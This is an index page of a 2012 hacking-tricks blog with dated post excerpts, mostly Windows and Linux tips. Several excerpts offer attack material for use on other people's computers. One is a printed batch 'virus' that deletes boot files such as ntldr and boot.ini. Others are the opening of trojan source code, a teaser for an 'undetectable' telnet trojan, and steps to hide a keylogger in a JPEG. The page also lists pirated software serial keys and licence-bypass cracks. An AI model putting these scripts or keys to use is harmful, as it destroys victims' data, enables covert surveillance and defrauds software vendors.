Sunday, 18 November 2012
HOW TO MAKE IDM LIFETIME.
In this post/article i tell you that how to make the IDM forever. Many of you are facing the problem that your IDM get expired in 15 or 30 days but using this trick you can make your IDM for lifetime.
You can Make Life Time without Any Software(no matter if u have upgrade your version)
Install IDM
Note before Use...
Wednesday, 31 October 2012
A Prank Virus

NOTE : PLEASE DO NOT TRY ON YOUR COMPUTER !!
First open the notepad and copy and paste the below mentioned codes in notepad and see the fun. You can edit the codes to make more funny or even deadly...
Monday, 29 October 2012
Find keylogger or any spyware in PC

Its great method to find or detect a keylogger or any other spyware in your PC or system. As we all know nowadays keyloggers and spywares are big concern as hackers are trying their best to infect the victims to hack their accounts. Today i will teach you how to find a...
Sunday, 28 October 2012
How to shutdown your friend's Pc
How to shutdown your friend's Pc through chating using cmd Hello friends. You can shutdown your friend's computer through chating. This is very simple and cool trick. Kindly follow these
steps ...
Saturday, 27 October 2012
What Is Brute Force and some Softwares for brute force attack

Hi , The topic of this article is "Brute Force".In this article i will explain the meaning of bruteforce and will provide some top Brute force softwares to download.Lets Strat....
Brute force (also known as brute force cracking) is a trial and error method used by application...
Flame (malware) what you need to know

Flame, also known as Flamer, sKyWIper, and Skywiper, is modular computer malware discovered in 2012 that attacks computers running the Microsoft Windows operating system.The program is being used for targeted cyber espionage in Middle Eastern countries. Its discovery was announced...
Dangerous Email File Attachments You Should Be Aware Of

Among the email attachment extensions that should not be opened at all, or if completely necessary, should be open in the special secure environment, are:
Very Dangerous File Formats:
.reg Possible Windows registry attac...
Friday, 26 October 2012
Ubuntu: The Complete Introduction for Beginners

Ubuntu is linux based operating system with the origin in south africa. Its name means "humanity towards others". Back in 2004, Linux was already established as a server operating system, but free software was not yet a part of everyday life. Further, Linux was thought of as...
Thursday, 25 October 2012
Advanced Port Scanning techniques

Advanced Port Scanning techniques
-----------------------------------------------------------------------------
Today i will teach you different types of port scanning and their analysis, drawbacks etc. Lets start with a brief overview of yesterday's tutorial.
In simple words,...
How to remove youtube copyright.[tutorial]

How to remove youtube copyright.
This guide will tell you how to resolve copyright issues for your youtube videos. With this, you can have your favorite music and images without that WMG deleting your account.
This method only covers 99% of copyrighted...
Tuesday, 16 October 2012
How To: Delete ghost messages from MS Outlook

Most people who use Microsoft Outlook as an email client for Gmail or their personal POP
mail would sometimes notice that it is trying to send out emails but there aren’t any in the
outbox. These are usually ghost messages that have been sent earlier or are too large
and stuck...
Sunday, 14 October 2012
Creating a Telnet Trojan for Windows XP
Following batch script will act as Telnet Trojan to any windows XP system, the best
part of it is it's fully undetectable to all ant-virus programs. Copy following lines in
notepad and save with any name with .bat extension for example Trojan.bat.
Cod...
Saturday, 13 October 2012
Warning: Fake Skype app. on Android is malware
A new piece of malware is trying to take advantage of Skype's increasing
popularity, especially on mobile devices. Cybercriminals have created a fake
version of the Skype for Android app, designed to earn money from
unsuspecting users. Trend Micro, which first discovered the malware,...
Friday, 12 October 2012
COLLECTION OF SERIEL KEYS ! (part 2)
Macromedia Studio MX ::::WSW600-59791-91721-99978
Magic Converter V 7.9.5.1 - MVC182749
Make Money 2.0 :::: PRF0200153
Mechanical Desktop 6.0 ::::400-19791979 / CD-Key:TLSQBS
MS Office 2007 - KGFVY-7733B-8WCK9-KTG64-BC7D8
MS Office 2010 Key - GGG8W-PJFRT-8MRQH-X99J2-PPPVM
MS XP - User Name - Creative, CD Key - FM9FY TMF7Q KCKCT V9T29 TBBBG
Nero Burning Rom 5.5=> 9M03-01A1-PCX7-K31A-8A94-98PT-KT2E-522A3D
Nero...
COLLECTION OF SERIEL KEYS ! (part 1)

Here is the some keys and serial number of some softwares
3D Studio Max 4 :::: Number:226-19791979 / CD
Key:XLSQBQ9zfll2WrZc+Vn0hWaw2dV/sccwKwsWY05TPwHden
Acrobat Distiller - WAW210P7121183-537
Adobe After Effects 5.5 : EWW470R1001999-030-259
Adobe Frame maker 7.0 ::::1030-1208-8265-3458-9287-7077-
Adobe...
What is CAPTCHA?

INTRODUCTION
A captcha is a program that can generate and grade tests that:
Captcha
(A) most humans can pass, but (B) current computer programs
can't pass. Such a program can be used to differentiate humans
from computers and has many applications for practical security,
including...
Monday, 8 October 2012
List of codes for the fancy alphabets used n the facebook chat box

Here is a list of codes for different alphabets:-
A = [[399197913893]]
B = [[115345298505025]]
C = [[53872404042]]
D = [[226910642728]]
E = [[140775945956538]]
F = [[136046106447549]]
G = [[119431374760220]]
H = [[205082339544090]]
...
Sunday, 30 September 2012
Keyboard Shotcuts
keyboard shortcuts
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bi...
How To Get Windows 8 Interface Instantly On Your Windows 7 PC
Windows 8 is yet to release, but buzz has started regarding it. We bring you an opportunity to try its desktop interface. Note that, It’s not the OS. It is just an application that gives your PC a look that resembles with widget-based look of Windows 8. You should have Windows 7 and .Net framework v4 installed on
your PC. Now, follow the steps belo...
Friday, 28 September 2012
How to sign up multiple times to a website with one/same gmail account
Sometimes you want to create multiple accounts in a website but you require different email id. In this very easy and simlple trick i'll share how you can create multiple accounts in some websites with only one gmail account. The basic logic behind the trick is some websites treats .(dot) as different email id but gmail treats them same.because gmail ignores .(dot) from your email id
for examle:-
examplemyid@gmail.com
example.myid@gmail.com
example.my.id@gmail.com
example.my.i.d@gmail.com
if...
Wednesday, 26 September 2012
Cloud increasing share in security spend

According to a report by AMI Partners released Wednesday, overall global spending on security products and services reached US$19 billion in 2011. It added that spending by small and midsize businesses (SMBs) would increase at a compound annual growth rate of over...
Sunday, 23 September 2012
Facebook Account Temporarily Locked or blocked::

Facebook Account Temporarily
Locked or blocked:::....
Isn't frustrating????
Reason:
A) May be Facebook making an
improvement in the database and
the account get "Locked" are
stored on. During this time,it may
not be able to gain access to the
account. It may last for an...
FreeBSD add a user to group
You need to use pw command. The pw utility is a command-line based editor for the system user and group files, allowing the superuser an easy to use and standardized way of adding, modifying and removing users and groups. First login as the root using su or sudo command.
Task: Add existing user to group
You would like to add existing user tom to secondary group called ftpusers. Type the...
Saturday, 22 September 2012
Bogus Facebook apps spreading Android malware

Third-party Android markets have traditionally been the main source of infection since the Android boom, as they are less strict than the genuine Play when it comes to bouncing malware.
Today Gmanetwork reports that, Users of mobile devices running Google’s Android OS were warned...
Howto Crack pdf File Password
If you want to crack pdf file passwords use pdfcrack.PDFCrack is a GNU/Linux (other POSIXcompatible
systems should work too) tool for recovering passwords and content from PDF-files. It is small, command line driven without external dependencies. The application is Open Source (GPL).
pdfcrack Features
Supports the standard security handler (revision 2 and 3) on all known...
How To Create Your Own RUN Commands
If you had a belief, that RUN commands are only for predefined OS related applications; then it’s past now. Because, now we can also create user defined RUN commands so that we can run any application installed or present inside the computer. This will not only make you...
How To Download Torrent At Faster Speed

Trick 1 : based on torrent client
First tip to speed torrent download is to use Vuze instead of other torrent clients. However if you still insist on
using other torrent forms here are some tips that might give you a boost in enhancing your download
speed….
Trick 2 : based on...
A Basic Knowledge About The Sim Card

This Is an Basic Knowledge About The Sim Card Wich U will Not Get in Google Also And Many People Doesn't Know This So I am Sharing Wit U guys Sim Cards Are Of 4 Types..Named As Below
SIM
H1, H2, H3, H4
H ka Matlab Nai Malum
H1=...
Thursday, 20 September 2012
Ubuntu Tip:How to Connect/disconnect VPN from the command line
This tutorial will explain How to Connect/disconnect VPN from the command line
If you want to interact with NetworkManager from the command line you can use the "nmcli" command.
You can list all NM connections using the following command
nmcli con
You can start connection (wifi, vpn, etc) using the following command
nmcli con up id ConnectionNa...
Understanding /etc/shadow file used under Linux or UNIX

/etc/shadow file stores actual password in encrypted format for user's account with additional
properties related to user password i.e. it stores secure user account information. All fields are
separated by a colon (:) symbol. It contains one entry per line for each user listed...
Wednesday, 19 September 2012
Permanent Solution To Delete Newfolder.exe Virus-(Manually)
Often people do complain regarding the New folder virus or Newfolder.exe. This newfolder.exe is an executable file that starts a malicious process which launches certain parasite components or runs a destructive payload. Even if the newfolder.exe file does nothing suspicious, its presence indicates that your
computer is infected with a particular threat.
The original name of the virus is:...
How To: UNIX Add A User To A Group

Q. How do I add a user to a group under Sun Solaris UNIX operating system from a shell
prompt or command line?
A.. You can useadd command to administer a new user login on the UNIX system. Solaris UNIX
/ HP-UX UNIX uses /etc/passwd, /etc/shadow and /etc/group files to store...
How To Create A Spam Virus
In my previous post How to create a computer virus? I gave a little information regarding methods to create viruses using different programming languages. But
let’s face it just creating a virus isn’t going to satisfy high class prankster. So here’s a new one coming your way. But as usual I should caution you trying this can
cause serious damage.
In this new prank we’ll create a spam virus in the...
Wifi Securiy: WEP

Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks in 1999. Recognizable by the key of 10 or 26 hexadecimal digits (or what is the
same 5 or 13 characters, 2 hex -> 1 byte each).
Two important elements to know are: IVs (initialization vectors),...
BitTorrent study finds most file-sharers are monitored.

Anyone using file-sharing service BitTorrent to download the latest film or music
release without paying is likely to be monitored, UK-based researchers suggest.
A Birmingham University study indicates that an illegal file-sharer downloading
popular content would be logged by...
Sunday, 16 September 2012
Linux setup shared directory
Sharing a directory among users in same group is one of the essential tasks. You need to use chmod command and add user to appropriate group. To make idea clear here is an scenario:
/home/myproj : is shared directory
usr1, usr2, ... usrN : would like to work and share files in /home/myproj directory
padmin : Main project administrator user
...
Saturday, 15 September 2012
WIFI HACKING Commands in Backtrack/linux

Wireless networks are all around and people often needs to keep their networks private and secure. There is a set of best practices to do so and a good way of testing how secure our networks are (i.e., WLAN, Wifi) is to carry out wifi auctions.
Normally, networks are protected using...
CRACKING LINUX FROM INSIDE
We all knows what linux os is. It is a biggest platform on which a developer develops there software and it is an freeware.This tweak allows an user to crack the linux from inside. . Be carefull when you are cracking your linux os...
THE LIST OF FREE CRACK AND KEYGENS SITEs
THE LIST OF FREE CRACK AND KEYGENS SITES THAT ARE SAFE FOR U.
Are you looking for a serial key and can’t find it no matter how much you try? Well, if that is driving you crazy, a visit to the next websites might just put an end to that. Here is the list of free crack and keygen sites that are safe to us...
Wednesday, 12 September 2012
Create A Hidden User Account
This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in
Windows 2000.
[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following ke...
Make Your Computer to Never Reboot Till You Format It Up.
Basically this is a virus you program on notepad and save it as .bat file to delete the files needed
for booting up a pc.
Please follow the steps to create this virus:..
Open up notepad and copy , paste the code below. Save it as a .bat fil...
Wednesday, 5 September 2012
Make Your Computer Speak When you Log On
It’s a simple trick to amaze your friends.When you Log On infront of them.
Yeah a trick to make your Computer Welcome you on Start Up.
Lets Do It:
Open Notep...
Tuesday, 4 September 2012
To trace the ip address of the various computer in the internet (on cmd)

If u want to see the ip address of those who where using the same url which u r using at the same time in an WLAN network then use this cmd.
Step1> open “run...
How To Speed Up Internet with Open DNS [Windows7]

In this article i am going to explain "How To Speed Up Internet with Open DNS" in Windows7.
Without the help of any software.
lets see how to setup OpenDNS for your Computer
First Go to Control Panel, then select “Network and Internet”.
Select “Network and Sharing Center”.
Select...
Saturday, 1 September 2012
How To Clear Pagefile on Shutdown
As an added security precaution it is possible to clear all data that has been written to the page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file.
[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key.
Registry...
Conceal Hidden Devices in Device Manager
When accessing Device Manager there may be hidden devices that are not displayed.
[Start] [Run] [Regedi...
Make Your Computer to Never Reboot Till You Format It Up.

Basically this is a virus you program on notepad and save it as .bat file to delete the files needed for booting up a pc.
Please follow the steps to create this virus:..
Open up notepad and copy , paste the code below. Save it as a .bat fil...
Clean your RAM using Notepad!!

you may recognize that your system gets slower and slower while playing and working a lot with your pc. That's cause your RAM is full of remaining progress pieces which you don't need any more.
To clean up your ram:
Create a new text file and name it as "ramcleaner" or anything...
Enable/Disable Local Group Policy Objects
In a non-networked environment (or in a networked environment that does not have a domain controller), the local Group Policy object's settings are more important, because they are not overwritten by other
Group Policy objects. You can open the Group Policy snap-in to edit the local Group Policy object that is stored on your local computer.
Click Group Policy...
Saturday, 11 August 2012
Space Eater(VIRUS) code

This is an virus source code. only for educational purpose DO NOT SPREAD IT.. It is harmful program.
BEWARE:-Do not compile it in your own pcs. do not recognize by any of the antivirus...
/* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE...
10 Interesting facts about Microsoft

Almost every one Knows Microsoft and its operating System Windows. But you will probably not know the following 10 interesting facts!
1. No one knows the reason, but it is impossible to create a folder named "con" or "Con". It is just not possible. And if you try to fool Windows...
Tuesday, 7 August 2012
How make a virus in Notepad-2

SHUT UR INTERNET PERMANENTLY:::
This is a slightly more advanced one. It shuts down your internet permanately. I tried it on
myself accidently, i knew what it did, and it still took me a couple of days to get my internet
back. works best on XP, not tested on vista or 7.
EDIT:...
How make a virus in Notepad-1

How to crash a PC Forever !:::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save...
QoS Bandwidth Reserve Setting - Faster Internet Connection
Beware Editing in the registry files can slow down your computer
By default, Windows XP reserves 20% of the connection bandwidth for QoS traffic। This tweak allows the setting to be altered to a different percentage of connection bandwidth। If the system uses more than a single adapter for network connections, each adapter may be set
individually...
Registry Tricks for Windows - Clear Pagefile on Shutdown
Beware Editing in the registry files can slow down your computer
As an added security precaution it is possible to clear all data that has been written to the
page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file.
[Start]...
Tuesday, 31 July 2012
Hide Keyloggers into a JPEG file

Through this trick you can easily hide
keyloggers.
First download any key logger from
google i think Ardamax is best.
After installing just follow these easy steps=>
1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked...
Sunday, 22 July 2012
Introduction To WebGoat A revolutionary Web Attack Tool
.jpg)
What is WebGoat?
WebGoat is aJ2EE web application, created by the OWASP community to provide a teaching environment for web application security. It is a deliberately insecure program,where you must go through a number of lessons . In each lessons, you learn about a new sort of...
Thursday, 12 July 2012
A new cross platform Trojan downloader has been discovered.
By Animesh Kantfact, Tweeks, Virus

A new Trojan downloader has been discovered which detects
your platform i.e. your operating system which you have and downloads the
corresponding malware for your platform.
Remember the cross-platform malware that exploited Java to
attack both PCs and Macs?
Here’s better one...
Sunday, 24 June 2012
GOOGLE DRIVE- NEW APPS FOR YOU

Recently, google launched its dropbox competitor, offering up to 5Gb of free storage space, not to mention the ability to download files and sync folders on multiple computers. here are a few tips to have make effective use of GOOGLE DRIVE.
PREVENT FILES FROM DOWNLOADING
We...
Sunday, 17 June 2012
SOMETHING MORE ABOUT THE IPv6

Enabling IPv6
In this post I am going to discuss something more about the IPv6 networks.
The switch’s implementation of IPv6 is disabled by default. To enable IPv6, use
the command:
ENABLE IPV6
To disable IPv6, use the command:
DISABLE...
Sunday, 10 June 2012
FEATURE OF THE IPv6
In my previous post I am just introduced the IPv6, its Feature and the challenges to Internet . Now in this post I am going to explain the feature of the IPv6. It has too many exciting features. Like:-
•Addressing
•Header
•Security
•Privacy
•Autoconfiguration
•Routing
•Quality of Service...
Friday, 8 June 2012
Introduction to IPv6 (Internet Protocol Version 6)

What is IPv6?
Internet Protocol Version 6 (IPv6) is a network layer protocol that enables data communications over a packet switched network. Packet switching involves the sending and receiving of data in packets between two nodes in a network.
It has primarily been developed...
Tuesday, 5 June 2012
Extend Windows 7 Trial Period

In this post I am going to show that how a person can extend itswindows 7 trial perioed by 30 days. (without using any software)
Extending the Trial By 30 Days
Now to actually perform the hack that will extend the trial mod...
Monday, 4 June 2012
How to trace E-mail sending Location

To track an email and its senders location details, you must know its internet IP address from which he sends the e-mail to you.
Here is the procedure on how you can track the email and its sender's locations by finding there Ips. Once we get the IP Address of the sender, it is...
Tuesday, 29 May 2012
How To Make Your Own Key Logger In Visual C++
Today I am going to teach "How
To Make Your Own Key Logger ". If you know the C++ then you can easily understand the program.
Now a days key loggers are common to all the advance users it is a basic software but very useful software . But many people don't know that what is key logger.
Key Loggers are often
called Keystroke logging is
the action of tracking (or logging) the keys struck on...
Friday, 25 May 2012
Make Your Computer Speak When you Log On
It’s a simple trick to amaze your friends.When you Log On infront of them.
Yeah a trick to make your Computer Welcome you on Start Up.
Lets Do It:
Open Notepad
Paste the bellow code in Np
Dim speaks, speech
speaks="Welcome Back, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
...
Friday, 11 May 2012
Create new instance of an Application in Windows 7 Super Taskbar

In windows 7 Taskbar instance of an application can easily be created by using Win + Number Key. Here number key signifies the position of the Application in the Taskbar
If you press Windows + 1, it will create a new instance of the first icon in the task bar. In the taskbar...
Friday, 6 April 2012
HOW TO CHANGE ALBUM ART OF ANY SONG
Where does album art come from?
The Player downloads album art from an online database where the information is supplied by a variety of non-Microsoft data providers, such as AMG.
The Player downloads album art when you rip a CD. To do so, the Player attempts to match the CD to an entry in the online database. If it finds a match, the Player automatically downloads the media information that...
Wednesday, 4 April 2012
Copy Command Prompt Output
Windows 7 command prompt can be used with a clip utility that can used to copy the contents of the command prompt output into clipboard. It is very much similar like the way tee command works in UNIX. Tee command pipelines the output of a command in UNIX to another file. In Windows 7 we can use the „Clip‟ utility to copy the text of command prompt. Adding clip next to any command copy the outpu...
HOW TO BACKUP AND RESTORE MY INTERNETS FAVOURITES OR BOOKMARKS
Although there are several third-party software programs that will enable you to backup, restore, and manage your Internet browser bookmarks or favorites, all modern browsers today include bookmark managers and are capable of backing up and restoring your bookmarks or favorites. Below is a listing of each of the major browsers and how to backup and recover your Internet bookmarks or favorit...
Monday, 2 April 2012
SUPER TASKBAR

In Windows 7, the taskbar has become a super Taskbar. All things are @ tips and fewer clicks are required for access to anything. Features of Windows 7 Taskbar
1. You can pin frequently used programs to the taskbar
...
Sunday, 1 April 2012
KNOW YOUR WINDOWS AND PCs CONFIGURATION
If you want to know about your computer/laptop's exact configuration then you must know this.
by this one can easily understand his/her computer's configuration.
Step1:- Go to Run
Step2:- Type 'dxdiag' press ente...
Saturday, 31 March 2012
TWENTY WINDOWS 7 KEY SHORTCUTS
From Desktop
Windows Key + Tab = Aero [press Tab to cycle between Windows]
Windows Key + E = Windows Explorer is launched.
Windows Key + R = Run Command is launched.
Windows Key + F = Search (which is there in previous Windows versions too)
Windows Key + X = Mobility Cen...
Friday, 30 March 2012
LOCK THE SCREEN SHORTCUTS
To Lock Screen in Windows 7 you have to press the Windows Key + L to lock it, now. The screen would be locked and password protected in case you have one.
In case you don‟t like shortkeys or you keep forgetting them, there‟s another option for screen loc...
HOW TO ACTIVATE GOD MODE IN WINDOWS 7(no software required)

God mode basically put every thing in one place i.e. folder and
additional hidden secrets and shortcuts basically in one spot.
So it is easy to find anything.
...
Thursday, 29 March 2012
Wednesday, 28 March 2012
Customize the Windows 7 log-on screen (no software required)

Windows 7 makes it easy changing the Windows log-on screen.
1. Go to start, and click on Run, type Regedit & press enter there.
2. Navigate to : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\ LogonUI\Backgrou...